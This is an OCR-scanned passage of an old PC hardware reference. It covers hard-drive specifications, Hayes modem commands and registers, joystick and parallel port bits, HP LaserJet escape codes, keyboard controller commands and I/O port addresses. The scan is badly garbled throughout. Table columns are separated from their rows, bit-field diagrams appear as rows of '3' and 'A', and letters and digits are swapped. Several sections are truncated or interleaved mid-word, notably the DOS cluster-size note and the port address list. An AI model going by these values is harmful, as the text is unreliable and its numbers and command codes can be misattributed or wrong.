Syquest SQ338F 
Tandon TM252 
Tandon TM262 
Tandon TAN501 
Tandon TAN502 
Tandon TAN503 
Tandon TM602S 
Tandon TM603S 
Tandon TM603SE 
Tandon TM702AT 
Tandon TM703 
Tandon TM703AT 
Tandon TM755 
Tandy SCSI 
Toshiba MK53F 
Toshiba MK54F 
Toshiba MK56F 
Toshiba MK134FA 
Toshiba MK358FA 
Toshiba MK358FB 
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11 


42 


66 


10 


20 


44 


OSNN 


so QOqFJUU0UA 


7 


823 


25 
25 


SCSI, RLL, Voice Coil 
MFM, Band stepper 
MFM, Band stepper 


STnn, MFM, 5- Band stepper 

65 SCSI, MFM, 5- Band stepper 
STnn, RLL, 5- Band stepper 

65 STnn, RLL, Band Stepper 
STnn, RLL, Band stepper 
STnn, MFM, 5- Band stepper 

28 STnn, MFM, 5- Band stepper 

40 SCSI, RLL, 5- Band stepper 
SCSI, RLL, 5- Band stepper 

40 STnn, RLL, 5- Band stepper 


MFM, 5- Band stepper 


40 SCSI, RLL, 5- Band stepper 
SCSI, RLL, 5- Band stepper 
40 STnn, RLL, 5- Band stepper 
29 IDE, 5 
28 SCSI, RLL, 5- Band stepper 


MFM, Band stepper 
MFM, FH Band stepper 
MFM, Band stepper 
MFM, Band stepper 


MFM, FH Band stepper 
SCSI, RLL, Voice coil 
29 IDE, 3« 
19 IDE, 3« 
15 IDE, 3« 
STnn, MFM, Voice coil 
40 STnn, MFM, FH Voice coil 
40 STnn, MFM, Voice coil 
28 STnn, MFM, Voice coil 
28 STnn, MFM, Voice coil 
28 STnn, MFM, FH Voice coil 
28 STnn, RLL, FH Voice coil 
STnn, MFM, Voice coil 
6 28 SCSI, RLL, Band stepper 
STnn, MFM, 3« Voice coil 
25 STnn 
15 16 ESDI, FH 
15 16 SCSI, FH 


Tulin 226 
Tulin 240 
Tulin 326 
Tulin 340 
WD93024A 
WD93024X 
WD93028A 
WD93028X 
WD93034X 
WD93038X 


stepper 


WD93044A 
WD93044X 
WD93048A 
WD93048X 
WD95024A 


WD95028AD 
WD95028X 
WD95038X 
WD95044A 
WD95048AD 
WD95048X 
WDAC140 
WDAC280 


WDSC320 
WDSC8320 


40 


40 
42.5 
85.1 

320 
320 


28 STnn, MFM, 3« Band stepper 
39 STnn, MFM, 3« Band stepper 
69 STnn, MFM, 3« Band stepper 
70 STnn, MFM, 3« Band stepper 
39 STnn, MFM, 3« Band stepper 
70 STnn, MFM, 3« Band 


28 STnn, MFM, 3« Band stepper 
39 STnn, MFM, 3« Band stepper 
69 STnn, MFM, 3« Band stepper 
70 STnn, MFM, 3« Band stepper 
28 STnn, MFM, 5- Band stepper 


69 STnn, MFM, 5- Band stepper 
70 STnn, MFM, 5- Band stepper 
70 STnn, MFM, 5- Band stepper 
28 STnn, MFM, 5- Band stepper 
69 STnn, MFM, 5- Band stepper 
70 STnn, MFM, 5- Band stepper 
19 STnn, MFM, 3« Voice coil 

19 STnn, MFM, 3« Voice coil 


SCSI, 3« 
SCSI, 3« 


- STnn indicates Seagate ST412/ST506 compatible 

- 3« indicates 3.5 inch half height drive 

- 5- indicates 5.25 inch half height drive 

- FH indicates Full Height 5.25 inch drive 

- 'u' in filesize indicates unformatted spec 

- formatted capacity is related to BIOS and may vary with different 


BIOS 


and OEM versions 


- read/write heads should normally never touch hard disk media 

- standard AT hard disk controllers do not use DMA for disk 1/0 due 
to the slow speed of the 8 Bit DMA chips used; Port 1/0 is used 
instead for an actual increase in performance 

- with some XT and ESDI systems it is necessary to use debug to 
execute the ROM disk format code; 
AH=Drive, AL=Interleave and jump to the code at C800:5 via the 
G =C800:5 command (some systems locate this code at C600:5, CA00:5 


and C 
- DOS v 
has c 


:Hayes modem 
AHayes Comman 


+++ 
Comma 
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The usual method is to set 


C00:5) 
ersion and disk size determine cluster size; DOS 2.x always 
luster size of 8K, while DOS 3.x+ has variable cluster sizes: 


2 - 16 Mb partitions 
16 - 128 Mb partitions 
128 - 256 Mb partitions 
256 - 512 Mb partitions 


info:modem commands 
d Set / Register Formats 


standard escape sequence 
standard pause character 


have 
have 
have 
have 


(see 
(see 


cluster size of 8K 
cluster size of 2K 
cluster size of 4K 


a 
a 
a 
a cluster size of 8K 


S2 below) 
S8 below) 


AT standard attention sequence 


ATA force immediate answer 
ATCO transmitter off 
ATC1 transmitter on 


ATD dial (ATD number) 
ATDP pulse dial (ATDP number) 
ATDT tone dial (ATDT number) 


ATEO disable local character echo 

ATE1 enable local character echo 

ATFO Half Duplex (modem echoes characters) 

ATF1 Full Duplex (modem does not echo characters) 


ATHO force line on hook 
ATH1 force line off hook 
ATH2 force line special off hook (used for HAM radio) 


ATIO request product code, formatted PPR, PP=prod., R=rev. 
ATI1 request ROM check sum 


ATL1 speaker volume low (modem specific) 

ATL2 speaker volume medium (modem specific) 

ATL3 speaker volume high (modem specific) 

ATMO speaker always off 

ATMI speaker on except while carrier present 

ATM2 speaker always on 

ATM3 speaker on except while dialing and carrier present 


ATO force modem into on-line state 
ATP sets modem to default pulse dial 


ATQO modem returns result codes 
ATQ1 modem does not return result codes 


ATR sets modem to answer mode after dialing out 
ATSn where Sn is S register number 'n' (see registers below) 
ATT sets modem to default tone dial 


ATVO send numeric codes 
ATVI1 send word result codes 


ATXO basic result code set "CONNECT", no dial tone detect 

ATX1 extended result code set "CONNECT 1200", no dialtone detect 
ATX2 wait for dial tone, extended result codes 

ATX3 detect busy signal, extended result codes 

ATX4 wait for dial tone, detect busy, extended result codes 


ATZ reset to power up condition 
AHayes 2400 Compatible Modem Commands 


ATBO CCITT V.22 at 1200 bps 
ATB1 BELL 212A at 1200 bps 


AT&C DCD always on 
AT&C1 DCD on while carrier present 


AT&D DTR ignored 

AT&D1 DTR fail disconnect enabled 

AT&D2 DTR fail disconnect enabled (auto answer off) 
AT&D3 DTR fail disconnect enabled (reset modem) 
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AT&F restore to factory configuration 


AT&G no guard tone 
AT&G1 550 Hz guard tone 
AT&G2 1800 Hz guard tone 


AT&J RJ11/RJ41S/RJ45 jack 
AT&J2 RJ12/RJ13 jack 


AT&L regular phone line 
AT&L1 leased line 


AT&M async operation 
AT&M1 async/sync operation 
AT&M2 sync auto dial 
AT&M3 sync manual dial 


AT&P 39/61 pulse make/break ratio 
AT&P1 33/67 pulse make/break ratio 


AT&T4 grant RDL test request 
AT&T5 deny RDL test request 


AT&W write current registers to non-volatile memory 
AT&X sync clock internal 


AT&X1 sync clock external 
AT&X2 sync clock slaved 


AT&Z store dial command line 
AHayes Compatible Modem Registers 


Not all modems support all of these registers and some modems have 
registers other than those listed here. Also note, some are read only. 


to set a register use: AT Sr=## (cr) 
to read the register: AT Sr? (cr) 


Where "r" is the register and (cr) is a carriage return 


% The following represent conventions used in the tables below: 


() indicates defaults for Smartmodem 1200 
** indicates possible inconsistencies across modems 


% Reg Values Register function 


Sto) 0-255 ring to answer on (0=don't answer) 

S1 0-255 ring count (clear after 8 sec) (read only) 

S2 0-255 escape char, normally "+", 128-255 disable escape 
S3 0-127 end of line character (0x0D/CR) 

S4 0-127 line feed character (0x0A/LF) 

S5 0-32,127 backspace character (0x08/BS) 

S6 2-255 pause before dialing in seconds (2) 


S7 1-255 wait for carrier in seconds (30) 
s8 0-255 pause for comma in dial string in seconds (2) 
S9 1-255 carrier detect response time in 1/10 second (6) 


S10 1-255 carrier loss delay in 1/10 second, 255=ignore CD (7) 
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% 
% 


% 
% 


S11 50-255 touch tone dial speed, in milliseconds (70) 
S12 20-255 escape guard time, in 1/50 second,0=no delay (50) 


37363 


534333231303 S13 power up async data format 

3 s 3 s 3 AAAAA unused 

3 3 3 3 AAAAAA result code, O=basic, i1=extended 
3 3 3 AAAAAAA parity, 0=disabled, 1=enabled 

3 3 AAAAAAAA parity, ©O=odd ,1=even 

3 AAAAAAAAA data bits, 0=7 bits, 1=8 bits 
AAAAAAAAAA undefined 

AAAAAAAAAKA buffer ovfw flag, ©0=disabled,1=enabled 
AAAAAAAAAAAA 8th bit, ©O=space, 1=mark (8 bit only) 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


37363 


534333231303 S14 option register status data format 
3 s 3 s 3 AAAAA unused ** 
3 3 s 3 AAAAAA local echo, 0=disabled, 1=enabled 
3 3 3 AAAAAAA result codes, ©O=enabled,1=disabled 
3 3 AAAAAAAA result codes, ©O=numeric, 1=word 

3 AAAAAAAAA command recognition, O=enable,1=disable 
AAAAAAAAAA dial method, ®=touch tone, 1=pulse 
AAAAAAAAAAA unused ** 

AAAAAAAAAAAA O=answer, 41=originate ** 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


S15 flag register ** 
37363534333231303 S16 test status 
3 s 3 s 3 s 3 AAAAA analog loop, @=inactive, i1=active 
3 s 3 s 3 s AAAAAA unused 
3 3 s 3 3 AAAAAAA digital loop, O=inactive, 1=active 
3 3 3 3 AAAAAAAA remote req digital loop,0=inact.,1=active 
3 3 3 AAAAAAAAA remote digital loop,0=inact.,1= active 
3 3 AAAAAAAAAA self test RDL, O=inactive, 1= active 
3 


AAAAAAAAAAA self test analog loop, 0=inactive, 1=active 
AAAAAAAAAAAA unused 


S18 0-255 remote test timer in seconds 
37363534333231303 S21 option status 
3 s 3 s 3 s 3 AAAAA jack type, 0=RJ11,RJ41, RJ45, 1=RJ12, RJ13 
3 3 3 3 3 3 AAAAAA unused 
3 3 3 3 3 AAAAAAA CTS state, 0=follows RTS, 1=forced on 
3 3 3 AAAAAAAAKA DTR modem behavior (see below) 
3 3 AAAAAAAAAAA DCD, 0=forced on, 1=follows carrier 
3 AAAAAAAAAAKA DSR, ©=forced on, 1=behaves normally 


AAAAAAAAAAAAA long space disconnect, O=disabled, 1=enabled 


43 DTR Modem Behavior Bits 

00 ignore DTR 

01 assume command state when DTR drops 

10 assume command state and disable auto-answer when DTR drops 
11 reset when DTR drops 


37363534333231303 S22 option status 

3 3 3 3 3 s AAAAAAA speaker volume, ©01=10w,10=med,11=high 
3 s 3 3 AAAAAAAAAA speaker setting (see below) 

3 AAAAAAAAAAAAAAA X command in effect 

AAAAAAAAAAAAAAAA make/break ratio, 0=39/61, 1=33/67 


Bits 
32 S22 Speaker Setting 
00 speaker always off 
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01 speaker on until carrier detected 
10 speaker always on 
11 speaker off during dialing, then on until CD 


% Bits 

% 654 S22 X Command in Effect 
100 X1 command in effect 
101 X2 command in effect 
110 X3 command in effect 
111 X4 command in effect 


7363534333231303 S23 option status 

3 3 3 3 3 s 3 AAAAA remote dig.loop request, 0=denied, 1=0k 
3 3 3 3 3 AAAAAAAA baud rate (see table) 

3 3 3 3 AAAAAAAAA unused 

3 3 AAAAAAAAAAKA parity (see table) 

AAAAAAAAAAAAAAA guard tone setting 


% Bits 

% 21 S23 Baud Rate Table 
00 0-300 bps 
01 600 bps 


10 1200 bps 
11 2400 bps 


% Bits 

% 54 S23 Parity Setting 
00 even parity 
01 parity bit always 0 
10 odd parity 
11 parity bit always 1 


% Bits 

% 76 S23 Guard Tone Setting 
00 no guard tones 
01 550 hz guard tone 
10 1800 hz guard tone 


S25 0-255 DTR detect delay in seconds (5) 
S26 0-255 RTS to CTS delay in milliseconds (1) 


7363534333231303 S27 option status 

3 3 3 3 3 s AAAAAAA synch/async mode (see table) 

3 3 3 3 3 AAAAAAAA phone line, 0= public, 1=leased 
3 3 3 3 AAAAAAAAA unused 

3 3 AAAAAAAAAAAA clock type (see table) 

3 AAAAAAAAAAAAA protocol, O=CCITT V.22, 1=Bell 212A 
AAAAAAAAAAAAAA unused 


% Bits 

% 10 S27 Sync/Async mode 
00 asynchronous mode 
01 async/sync mode 
10 sync auto-dial 
11 sync manual dial 


% Bits 

% 45 S27 Clock Type 
00 internal clock used 
01 external clock used 
10 slaved clock used 

:game port:joystick 
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AJoystick / Game Port (201h) 


% 


% 


37363 


534333231303 Port at 201h used with Joysticks 

3 3 3 3 3 AAAAA joystick a, x coord (0 = timing active) 
3 3 3 3 AAAAAA joystick a, y coord (0 = timing active) 
3 3 3 AAAAAAA joystick b, x coord (0 = timing active) 

3 3 AAAAAAAA joystick b, y coord (0 = timing active) 

3 AAAAAAAAA joystick a, button 1 (0=pressed) 
AAAAAAAAAA joystick a, button 2 (0=pressed) 
AAAAAAAAAKA joystick b, button 1 (O=pressed) 
AAAAAAAAAAAA joystick b, button 2 (0=pressed) 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


37363 


534333231303 Port at 201h used with Paddles 

3 3 s 3 3 AAAAA paddle a coord (0 = timing active) 
3 3 s 3 AAAAAA paddle b coord (0 = timing active) 
3 3 3 AAAAAAA paddle c coord (0 = timing active) 

3 3 AAAAAAAA paddle d coord (0 = timing active) 

3 AAAAAAAAA paddle a, button (©=pressed) 
AAAAAAAAAA paddle b, button (0=pressed) 
AAAAAAAAAAKA paddle c, button (0=pressed) 
AAAAAAAAAAAA paddle d, button (©=pressed) 


736 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


- accessed through port 201h 
- bits 3-0 are resistive inputs with the length of the pulse 
determined by 0-100K ohm resistive load. Use this formula: 


time = 24.2® + ( 0.011ae * resistance ) 
or 
resistance = ( time - 24.2 ) / 0.011 


- a read should be immediately preceded by a write (any data) 
to start timing for the resistive values. 


:Laserjet:HP Laserjet 
AHewlett Packard Laserjet Printer Control Codes 


% 


% 


% 


Printer Control and Orientation 

ESC E Reset printer 

ESC Z Self Test 

ESC &100 Portrait orientation 

ESC &110 Landscape orientation 

ESC (SOP Select fixed space font 

ESC (S1P Select proportional font 

ESC (SOS Set upright character orientation 
ESC (S1S Set Italic character orientation 
ESC &1#X Select '#' number of copies 

ESC &10H Eject page 

ESC &11H Feed paper from tray 

ESC &12H Feed paper manually 

ESC &13H Feed envelope 

ESC &10T Default stacking position 

ESC &11T Togglestacking position 


8 Bit Symbol Set Selection 


ESC (8U Select Roman 8 symbol set 
ESC (8K Select Kana 8 symbol set 
ESC (8M Select Math 8 symbol set 

7 Bit Symbol Set Selection 

ESC (OU Select USASCII symbol set 
ESC (OB Select Line Draw symbol set 
ESC (0A Select Math symbol set 
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ESC (OM Select Math 7 symbol set 
ESC (0Q Select Math 8a symbol set 
ESC (1Q Select Math 8b symbol set 
ESC (1U Select US Legal symbol set 
ESC (OE Select Roman Extension symbol set 
ESC (OD Select ISO Denmark/Norway symbol set 
ESC (1E Select ISO United Kingdom symbol set 
ESC (0F Select ISO France symbol set 
ESC (0G Select ISO German symbol set 
ESC (0I Select ISO Italy symbol set 
ESC (0S Select ISO Sweden/Finland symbol set 
ESC (1S Select ISO Spain symbol set 
ESC (15U Select PiFont symbol set 
ESC (2Q Select PiFonta symbol set 
% Font Management 
ESC (S3T Select Courier font 
ESC (SOT Select Line Printer font 
ESC (S1T Select Pica font 
ESC (S2T Select Elite font 
ESC (SAT Select Helvetica font 
ESC (S5T Select Times Roman (TMS RMN) font 
ESC (S6T Select Gothic font 
ESC (S7T Select Script font 
ESC (S8T Select Prestige font 
ESC *c#D Specify font ID '#' 
ESC *C#E Specify character code '#' 
ESC *CcOF Delete all fonts, including permanent 
ESC *C1F Delete all temporary fonts 
ESC *c2F Delete last font ID specified 
ESC *c3F Delete last character code and font ID specified 
ESC *c4F Make last font ID temporary 
ESC *c5F Make last font ID permanent 
ESC *C6F Copy or assign last font ID specified 
ESC *c7F Reestablish ROM 
ESC *c8F Set primary font 
ESC *c9F Set secondary font 
ESC *c10F Set primary and secondary font default 
ESC )s#W <data> Create font header 
ESC (Ss#W <data> Download character 
ESC (#X <data> Designate downloaded font as primary 
ESC )#X <data> Designate downloaded font as secondary 
ESC (#@ Primary font default (see printer manual) 
ESC )#@ Secondary font default(see printer manual) 
% Pitch and Point Selection 
ESC (sS10H Set 10 pitch 
ESC (s12H Set 12 pitch 
ESC (S16.6H Set 16.66 pitch 
ESC (S7V Set point size to 7 
ESC (S8V Set point size to 8 
ESC (s8.5V Set point size to 8.5 
ESC (S10V Set point size to 10 
ESC (s12V Set point size to 12 
ESC (Ss14.4V Set point size to 14.4 
% Page Dimensions 
ESC &1#P Set page length to '#' lines 
ESC &1l#E Set top margin to '#' lines 
ESC &1l#F Set text length to '#' lines 
ESC 9 Clear margins 
ESC &a#L Set left margin to column '#' 
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ESC &a#M Set right margin to column '#' 
ESC &1#C Set vertical motion index to '#' 1/48" increments 
ESC &1#D Set lines per inch to '#', valid values are: 
1, 2, 3, 4, 6, 8, 12, 16 or 24 
ESC &k#H Set horizontal motion index where # is derived 
using # = (120.0 / cpi) (1/10 precision) 
% Cursor Positioning 
ESC &a#R Move to row '#' 
ESC &a#C Move to col '#' 
ESC &a#H Move to horizontal position '#' in decipoints 
ESC &a#V Move to vertical position '#' in decipoints 
ESC *p#X Move to horizontal position '#' in dots 
ESC *p#Y Move to vertical position '#' in dots 
ESC &f0S Push cursor position 
ESC &f1 Pop cursor position 
% Raster Graphics 
ESC *t75R Select 75 dots per inch graphics mode 
ESC *t100R Select 100 dots per inch graphics mode 
ESC *t150R Select 150 dots per inch graphics mode 
ESC *t300R Select 300 dots per inch graphics mode 
ESC *r0A Start graphics at left most position 
ESC *r1A Start graphics at current cursor 
ESC *b#W <data> Transfer '#' byte raster image as stream "<data>" 
ESC *rB End graphics 
% Advanced Graphics 
ESC *c#A Set horizontal rule/pattern size in dots 
ESC *c#H Set horizontal rule/pattern size in decipoints 
ESC *c#B Set vertical rule/pattern size in dots 
ESC *c#V Set vertical rule/pattern size in decipoints 
ESC *cOP Select black rule 
ESC *c2P Select gray scale pattern 
ESC *c3P Select HP-Defined pattern 
ESC *c#G Set grey scale pattern, where # is a value between 
[0..6] for HP defined patterns and [0..100] to 
specify percentage gray scaling. The mode depends 
on the rule/pattern selected using ESC *c?P 
ESC *C1G Vertical lines pattern 
ESC *c2G Horizontal lines pattern 
ESC *c3G Diagonal lines pattern (upward left to right) 
ESC *c4G Diagonal lines pattern (downward left to right) 
ESC *c5G Horizontal/vertical grid lines pattern 
ESC *C6G Diagonal grid pattern 
ESC *c#G Set gray scaling to '#' percent 
% Macro commands 
ESC &f#Y Identify macro as ID "#' 
ESC &f0X Start macro definition 
ESC &f1X Stop macro definition 
ESC &f2X Execute macro 
ESC &f3X Call macro 
ESC &f4X Enable auto macro overlay 
ESC &f5X Disable auto macro overlay 
ESC &f6X Delete all macros 
ESC &f7X Delete all temporary macros 
ESC &f8X Delete macro ID 
ESC &f9X Make macro temporary 
ESC &f10X Make macro permanent 
% Miscellaneous 
ESC (S#B Set stroke weight '#'=(7..-7), 7=bold, -7=light 
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ESC &dD Set underline on 
ESC &d@ Set underline off 
ESC = Half line feed 
ESC Y Turn display functions mode on 
ESC Z Turn display functions mode off (default) 
ESC &p#xX <data> Disable command interpretation for the '#' bytes 
following this command 
ESC &10L Disable perforation skip 
ESC &11L Enable perforation skip 
ESC &kOG Set line terminators to CR=CR, LF=LF, FF=FF 
ESC &k1G Set line terminators to CR=CR+LF, LF=LF, FF=FF 
ESC &k2G Set line terminators to CR=CR, LF=CR+LF, FF=CR+FF 
ESC &k3G Set line terminators to CR=CR+LF, LF=CR+LF, FF=CR+FF 
ESC &SOC Enable end of line wrap 
ESC &S1C Disable end of line wrap 
% Escape sequence combination rules: 
1. The first 2 characters following the ESC must be the same. 
2. The final character in any sequence other than the last must be 
changed to lower case. 
3. The last character in the complete sequence must be changed to 
upper case. 
4. Escape sequences must be specified in the order in which they 


should be performed. 


- the space following ESC is not included in the string 


: keyboard 
AKeyboard 


commands 
Commands & Responses 


ACommands System Issues to Keyboard (via 8042 port 60h) 


ED 


EE 


FO 


F2 


Set/Reset Mode Indicators, keyboard responds with ACK then 
waits for a following option byte. when the option byte is 
received the keyboard again ACK's and then sets the LED's 
accordingly. Scanning is resumed if scanning was enabled. 
If another command is received instead of the option byte 
(high bit set on) this command is terminated. Hardware 
defaults to these indicators turned off. 


387-3323130 Keyboard Status Indicator Option Byte 
3 3 3 AAAA Scroll-Lock indicator (©=off, 1=on) 
3. 3 AAAAA Num-Lock indicator (0=off, 1=0n) 
3 AAAAAA Caps-Lock indicator (0=off, 1=0n) 
AAAAAAAA reserved (must be zero) 


Diagnostic Echo, keyboard echoes the EE byte back to the system 
without an acknowledgement. 

PS/2 Select/Read Alternate Scan Code Sets, instructs keyboard 

to use one of the three make/break scan code sets. Keyboard 
responds by clearing the output buffer/typematic key and then 
transmits an ACK. The system must follow up by sending an 
option byte which will again be ACK'ed by the keyboard: 


00 return byte indicating scan code set in use 
01 select scan code set 1 (used on PC & XT) 
02 select scan code set 2 

03 select scan code set 3 


PS/2 Read Keyboard ID, keyboard responds with an ACK and a two 
byte keyboard ID of 83AB. 
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F3 


F4 


F5 


F6 


F7 


F8 


F9 


FA 


FB 


FC 


FD 


Set Typematic Rate/Delay, keyboard responds with ACK and waits 
for rate/delay byte. Upon receipt of the rate/delay byte the 
keyboard responds with an ACK, then sets the new typematic 
values and scanning continues if scanning was enabled. 


37363534333231303 _Typematic Rate/Delay Option Byte 

3 3 3 AAAAAAAARAA typematic rate indicator (see -INT 16,3-) 
3 3 3 3 3 AAAAAAAA A in period formula (see below) 

3 3 3 AAAAAAAAAKA B is period formula (see below) 

3 AAAAAAAAAAAAAA typematic delay 

AAAAAAAAAAAAAAA always zero 


delay = (rate+1) * 250 (in milliseconds) 
rate = (8+A) * (2**B) * 4.17 (in seconds, fi 20%) 


Defaults to 10.9 characters per second and a 500ms delay. If a 
command byte (byte with high bit set) is received instead of an 
option byte this command is cancelled. 

Enable Keyboard, cause the keyboard to clear its output buffer 
and last typematic key and then respond with an ACK. The 
keyboard then begins scanning. 

Default w/Disable, resets keyboard to power-on condition by 
clearing the output buffer, resetting typematic rate/delay, 
resetting last typematic key and setting default key types. 

The keyboard responds with an ACK and waits for the next 
instruction. 

Set Default, resets to power-on condition by clearing the output 
buffer, resetting typematic rate/delay and last typematic key 
and sets default key types. The keyboard responds with an ACK 
and continues scanning. 

PS/2 Set All Keys to Typematic, keyboard responds by sending an 
ACK, clearing its output buffer and setting the key type to 
Typematic. Scanning continues if scanning was enabled. This 
command may be sent while using any Scan Code Set but only has 
effect when Scan Code Set 3 is in use. 

PS/2 Set All Keys to Make/Break, keyboard responds by sending an 
ACK, clearing its output buffer and setting the key type to 
Make/Break. Scanning continues if scanning was enabled. This 
command may be sent while using any Scan Code Set but only has 
effect when Scan Code Set 3 is in use. 

PS/2 Set All Keys to Make, keyboard responds by sending an ACK, 
clearing its output buffer and setting the key type to Make. 
Scanning continues if scanning was enabled. This command may 

be sent while using any Scan Code Set but only has effect when 
Scan Code Set 3 is in use. 

PS/2 Set All Keys to Typematic Make/Break, keyboard responds by 
sending an ACK, clearing its output buffer and setting the key 
type to Typematic Make/Break. Scanning continues if scanning 
was enabled. This command may be sent while using any Scan Code 
Set but only has effect when Scan Code Set 3 is in use. 

PS/2 Set Key Type to Typematic, keyboard responds by sending an 
ACK, clearing its output buffer and then waiting for the key ID 
(make code from Scan Code Set 3). The specified key type is then 
set to typematic. This command may be sent while using any 
Scan Code Set but only has effect when Scan Code Set 3 is in use. 
PS/2 Set Key Type to Make/Break, keyboard responds by sending an 
ACK, clearing its output buffer and then waiting for the key ID 
(make code from Scan Code Set 3). The specified key type is then 
set to Make/Break. This command may be sent while using any Scan 
Code Set but only has effect when Scan Code Set 3 is in use. 
PS/2 Set Key Type to Make, keyboard responds by sending an ACK, 
clearing its output buffer and then waiting for the key ID (make 
code from Scan Code Set 3). The specified key type is then set 
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FE 


FF 


AKeyboard 


00 


to Make. This command may be sent while using any Scan Code Set 
but only has effect when Scan Code Set 3 is in use. 

Resend, should be sent when a transmission error is detected 
from the keyboard 

Reset, Keyboard sends ACK and waits for system to receive it 
then begins a program reset and Basic Assurance Test (BAT). 
Keyboard returns a one byte completion code then sets default 
Scan Code Set 2. 


Responses to System (via 8042 port 60h) 


Key Detection Error or Overrun Error for Scan Code Set 1, 
replaces last key in the keyboard buffer if the buffer is full. 
BAT Completion Code, keyboard sends this to indicate the keyboard 
test was successful. 

Echo Response, response to the Echo command. 

Break Code Prefix in Scan Code Sets 2 and 3. 

Acknowledge, keyboard sends this whenever a valid command or 
data byte is received (except on Echo and Resend commands). 

BAT Failure Code, keyboard sends this to indicate the keyboard 
test failed and stops scanning until a response or reset is sent. 
Resend, keyboard request resend of data when data sent to it is 
invalid or arrives with invalid parity. 

Key Detection Error or Overrun Error for Scan Code Set 2 or 3, 
replaces last key in the keyboard buffer if the buffer is full. 
Keyboard ID Response, keyboard sends a two byte ID after ACK'ing 
the Read ID command. The byte stream contains 83AB in LSB, MSB 
order. The keyboard then resumes scanning. 


- command F7 through FD are NOP's on the AT and are ACcK'ed but not 
acted upon 
- see -8042- —MAKE CODES- -—BREAK CODES- -—INT 16,3- 
‘parallel port:printer port 
NAParallel Printer Port 


% Port 3BC printer data output (readable) 


3 


7 
3 
3 
3 
3 
3 
3 
3 


363 


534333231303 ports 278, 378, 3BC 

3 3 3 3 3 AAAAA data bit 0, hardware pin 2 
3 3 3 3 AAAAAA data bit 1, hardware pin 3 
3 3 3 AAAAAAA data bit 2, hardware pin 4 

3 3 AAAAAAAA data bit 3, hardware pin 5 

3 AAAAAAAAA data bit 4, hardware pin 6 
AAAAAAAAAA data bit 5, hardware pin 7 
AAAAAAAAAKA data bit 6, hardware pin 8 


6 
3 
3 
3 
3 
3 
3 


AAAAAAAAAAAA data bit 7, hardware pin 9 


% Port 3BD printer status register (Parallel Printer Port) 


3 


63534333231303 ports 279, 379, 3BD 

3 3 3 3 3 3 AAAAA 1 = time-out 

3 3 3 3 AAAAAAAA unused 

3 s 3 AAAAAAAAA 1 = error, pin 15 

3 3 AAAAAAAAAA 1 = on-line, pin 13 

5 \ARAAAARAAA 1 = out of paper, pin 12 
\AAAAAARAAAR 0 = Acknowledge, pin 10 


NAAARAAAAAAKA 0 = busy, pin 11 


% Port 3BE printer control register (Parallel Printer Port) 


37363534333231303 ports 27A, 37A, 3BE 
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3 3 3 AAAAA 1 = output data to printer, (pin 1) 
3 s AAAAAA 1 = auto line feed, (pin 14) 

3 AAAAAAA © = initialize printer, (pin 16) 
AAAAAAAA 1 = printer reads output, (pin 17) 
AAAAAAAAA 0 = IRQ disable, 1=IRQ enable for ACK 
\AARARAAARAAAA unused 


3 
3 
3 
3 


WU _Wd W Wù W 
WU _WdÙ W W W 
WU_Wd WV W W 


:ports:port addresses:hardware ports 
APORTS Common I/0 Port Addresses 


Port addresses are not always constant across PC, AT and PS/2 
Unless marked, port addresses are relative to PC and XT only 


% 000-00F 8237 DMA controller 
000 Channel 0 address register 
001 Channel 0 word count 

002 Channel 1 address register 
003 Channel 1 word count 

004 Channel 2 address register 
005 Channel 2 word count 

006 Channel 3 address register 
007 Channel 3 word count 

008 Status/command register 
009 Request register 

00A Mask register 

00B Mode register 

00C Clear MSB/LSB flip flop 
00D Master clear temp register 
00E Clear mask register 

00F Multiple mask register 


% 010-01F 8237 DMA Controller (PS/2 model 60 & 80), reserved (AT) 


% 020-02F 8259A Master Programmable Interrupt Controller 
020 8259 Command port (see -8259-) 
021 8259 Interrupt mask register (see 8259) 


% 030-03F 8259A Slave Programmable Interrupt Controller (AT,PS/2) 


% 040-05F 8253 or 8254 Programmable Interval Timer (PIT, see -8253-) 
040 8253 channel 0, counter divisor 
041 8253 channel 1, RAM refresh counter 
042 8253 channel 2, Cassette and speaker functions 
043 8253 mode control (see -8253-) 
044 8254 PS/2 extended timer 
047 8254 Channel 3 control byte 


% 060-067 8255 Programmable Peripheral Interface (PC,XT, PCjr) 
060 8255 Port A keyboard input/output buffer (output PCjr) 
061 8255 Port B output 
062 8255 Port C input 
063 8255 Command/Mode control register 


% 060-06F 8042 Keyboard Controller (AT,PS/2) 
060 8042 Keyboard input/output buffer register 
061 8042 system control port (for compatability with 8255) 
064 8042 Keyboard command/status register 


070 CMOS RAM/RTC, also NMI enable/disable (AT,PS/2, see -RTC-) 
071 CMOS RAM data (AT,PS/2) 


080 Manufacturer systems checkpoint port (used during POST) 
% 080-090 DMA Page Registers 
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% 


% 


% 


% 
% 


% 


% 


% 


% 


% 


081 High 
082 High 
083 High 


090-097 

090 Cent 
091 Card 
092 Syst 
094 Syst 
095 Rese 
096 Adap 
097 Rese 


OAO NMI 
OAO - OBF 
OAO Seco 
OA1 Seco 


OCO TI S 
OC0-O0DF 
0C2 DMA 


0EO-0EF 


OFO-OFF 
0F0-0F5 
OFO Disk 
0F2 Disk 
0F4 Disk 
0F5 Disk 


0F8-0FF 


100-10F 
100 POS 
101 POS 
102 POS 

Bit 
103 POS 
104 POS 
105 POS 

Bit 

Bit 
106 POS 
107 POS 


110-1EF 


170-17F 
170 disk 
171 disk 
172 disk 
173 disk 
174 disk 
175 disk 
176 disk 
177 disk 


1FO-1FF 
1FO disk 
1F1 disk 
1F2 disk 
1F3 disk 
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order 4 bits of DMA channel 2 address 
order 4 bits of DMA channel 3 address 
order 4 bits of DMA channel 1 address 


POS/Programmable Option Select (PS/2) 
ral arbitration control Port 
selection feedback 
em control and status register 
em board enable/setup register 
rved 
ter enable/setup register 
rved 


Mask Register (PC,XT) (write 80h to enable NMI, 00h disable) 
Second 8259 Programmable Interrupt Controller (AT, PS/2) 


nd 8259 Command port (see -8259-) 
nd 8259 Interrupt mask register (see 8259) 


N76496 Programmable Tone/Noise Generator (PCjr) 
8237 DMA controller 2 (AT) 
channel 3 selector (see ports 6 & 82) 


Reserved 


Math coprocessor (AT, PS/2) 
PCjr Disk Controller 
Controller 

Controller control port 
Controller status register 
Controller data port 


Reserved for future microprocessor extensions 


POS Programmable Option Select (PS/2) 
Register 0, Adapter ID byte (LSB) 
Register 1, Adapter ID byte (MSB) 
Register 2, Option select data byte 1 
O is card enable (CDEN) 

Register 3, Option select data byte 2 
